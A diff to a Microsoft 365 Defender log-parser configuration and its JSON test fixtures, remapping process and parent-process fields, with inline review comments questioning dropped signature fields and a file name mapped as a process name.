"{{json_event.message.properties.Location}}" action.properties.LogonId: "{{json_event.message.properties.LogonId}}" @@ -250,12 +226,6 @@ stages: - set: user.roles: '["{{json_event.message.properties.AccountType}}"]' filter: '{{json_event.message.properties.get("AccountType")}}' - - set: - process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' - filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 0}}' - - set: - process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}' - filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 0}}' - set: network.protocol: "{{json_event.message.properties.RequestProtocol or json_event.message.properties.Protocol}}" filter: '{{json_event.message.properties.get("RequestProtocol") != None or (json_event.message.properties.get("Protocol") != None and json_event.message.properties.Protocol != "Negotiate")}}' 
@@ -274,6 +244,98 @@ stages: } filter: '{{json_event.message.properties.RawEventData.get("OperationProperties") != None}}' + set_process_events: + actions: + - set: + process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" + process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" + process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" + process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}" + process.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}" + process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" + process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}" + process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" + process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" + process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" + process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" + process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" + process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" + process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}" + process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}" + process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}" + action.properties.process.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" + action.properties.process.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" + 
action.properties.process.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" + action.properties.process.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" + action.properties.process.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}" + action.properties.process.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" + action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" + action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.process.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + + - set: + process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:] != [""]}}' + + - set: + process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.ProcessCommandLine.split(" ")[1:] != [""]}}' + + 
set_process_deviceprocess_events: + actions: + - set: + process.parent.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}" + process.parent.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}" + process.parent.command_line: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + process.parent.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" + process.parent.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" + process.parent.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" + process.parent.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" + process.parent.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" + process.parent.pid: "{{json_event.message.properties.InitiatingProcessId}}" + process.parent.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}" + process.parent.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" + process.parent.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" + process.parent.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" + process.parent.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" + process.parent.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" + process.pid: "{{json_event.message.properties.ProcessId}}" + process.start: "{{json_event.message.properties.ProcessCreationTime}}" + process.name: "{{json_event.message.properties.FileName | basename}}" + process.command_line: "{{json_event.message.properties.ProcessCommandLine}}" + process.working_directory: "{{json_event.message.properties.FolderPath | dirname}}" + 
action.properties.process.TokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" + action.properties.process.IntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" + action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" + action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" + action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" + action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" + action.properties.process.VersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" + action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" + action.properties.process.parent.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" + action.properties.process.parent.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" + action.properties.process.parent.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" + action.properties.process.parent.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" + action.properties.process.parent.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" + action.properties.process.parent.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + action.properties.process.parent.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" + action.properties.process.parent.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" + action.properties.process.parent.VersionInfoInternalFileName: 
"{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.process.parent.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.process.parent.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.process.parent.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + + - set: + process.parent.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:] != [""]}}' + + - set: + process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.ProcessCommandLine.split(" ")[1:] != [""]}}' + set_alert_evidence_fields: actions: - set: @@ -356,7 +418,7 @@ stages: event.dataset: "device_events" event.category: ["host"] action.properties.RemoteDeviceName: "{{json_event.message.properties.RemoteDeviceName}}" - action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" + #action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" set_device_file_certificate_info_fields: actions: - set: 
@@ -469,15 +531,15 @@ stages: - set: event.dataset: "device_process_events" event.category: ["process"] - process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}" - process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}" - action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" - action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" - action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" - action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" - action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" - action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" - action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" + #process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}" + #process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}" + #action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" + #action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" + #action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" + #action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" + #action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" + 
#action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" + #action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" set_device_registry_events_fields: actions: - set: diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event.json b/Microsoft/microsoft-365-defender/tests/test_device_event.json index ca708b0ed..17cad5081 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_event.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_event.json 
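Review bot: Commenting out `process.code_signature.status` and `process.code_signature.subject_name` drops the signature status and signer from `device_process_events`, and no hunk visible in this patch adds an equivalent mapping (the new lines above cover TokenElevation, IntegrityLevel and VersionInfo*, not the signature fields). Signature status is one of the fields a process-creation detection most often keys on, so losing it silently is a regression rather than a cleanup. If a shared stage outside this patch now sets these fields, a one-line comment here should say so; otherwise keep the two `process.code_signature.*` lines and drop only the `action.properties.Process*` duplicates. Note that the source keys are `InitiatingProcessSignatureStatus` / `InitiatingProcessSignerType`, i.e. they describe the initiating (parent) process, so when restoring them `process.parent.code_signature.*` may be the more accurate target — that mismatch could be the reason they were disabled, in which case the comment should record it.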
@@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json new file mode 100644 index 000000000..fedd99aea --- /dev/null 
+++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json 
@@ -0,0 +1,100 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files 
(x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": 
"05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files 
(x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + 
"info" + ] + }, + "@timestamp": "2024-11-12T10:17:24.858829Z", + "action": { + "properties": { + "AccountSid": "S-1-2-3", + "process": { + "parent": { + "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", + "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "FileSize": 3316224, + "LogonId": "5223047", + "VersionInfoCompanyName": "Test Corporation", + "VersionInfoFileDescription": "Browser EXE", + "VersionInfoInternalFileName": "Browser.EXE", + "VersionInfoOriginalFileName": "Browser.EXE", + "VersionInfoProductName": "Test Product", + "VersionInfoProductVersion": "1, 0, 0, 1" + } + } + }, + "type": "SensitiveFileRead" + }, + "file": { + "directory": "C:\\Log", + "name": "FileName.mdb", + "size": 286720 + }, + "host": { + "id": "abcdef0123456789", + "name": "user.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "73291" + } + } + }, + "process": { + "name": "FileName.mdb", + "parent": { + "args": [ + "/DBMode", + "/Network", + "/ProjectID", + "/Ticket", + "0", + "0", + "12345678-1234-5678-9012-345678901234", + "123456789" + ], + "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "executable": "c:\\program files (x86)\\browser.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "browser.exe", + "pid": 1328, + "start": "2024-11-12T10:17:23.990532Z", + "user": { + "domain": "company", + "email": "USERNAME@COMPANY.COM", + "id": "S-1-2-3", + "name": "username" + }, + "working_directory": "c:\\program files (x86)" + }, + "working_directory": "C:" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} 
\ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json similarity index 98% rename from Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json rename to Microsoft/microsoft-365-defender/tests/test_device_events_2.json index 1f1351d52..494baa569 100644 --- a/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json @@ -16,7 +16,11 @@ "@timestamp": "2024-10-22T15:09:08.851712Z", "action": { "properties": { - "InitiatingProcessLogonId": "0" + "process": { + "parent": { + "LogonId": "0" + } + } }, "type": "ScriptContent" }, @@ -38,10 +42,9 @@ }, "process": { "parent": { - "pid": 0 - }, - "pid": 417271, - "start": "2024-10-22T15:09:08.624070Z" + "pid": 417271, + "start": "2024-10-22T15:09:08.624070Z" + } }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json new file mode 100644 index 000000000..c34cefa50 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json 
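Review bot: In this expected output the initiating process (`InitiatingProcessId` 1328, `browser.exe`) lands under `process.parent`, and the file that was read (`FileName.mdb` in `C:\Log`) is emitted as `process.name` and `process.working_directory`, whereas in `test_device_events_get_clipboard_data.json`, where `FileName` is null, the same initiating-process fields land under `process` itself. For a `SensitiveFileRead` event the file is not a process: a consumer filtering on `process.name` will see `FileName.mdb` as a running program and miss `browser.exe`, the actual actor, while the file is already correctly carried in `file.name` / `file.directory`. If the parser deliberately shifts the initiating process to `process.parent` whenever `FileName` is present, that rule is surprising enough to deserve a comment in the parser stage (outside this patch), and this fixture should not assert `"name": "FileName.mdb"` under `process`. Separately, `process.parent.args` is listed in sorted order (`/DBMode`, `/Network`, …, `0`, `0`) rather than command-line order; if the test harness sorts lists before comparing that is harmless, but otherwise the flag-to-value association that `split(" ")[1:]` preserves is being asserted away.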
@@ -0,0 +1,83 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-efab-56789123abcd\",\"File
Size\":null,\"InitiatingProcessFileSize\":44152968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft 
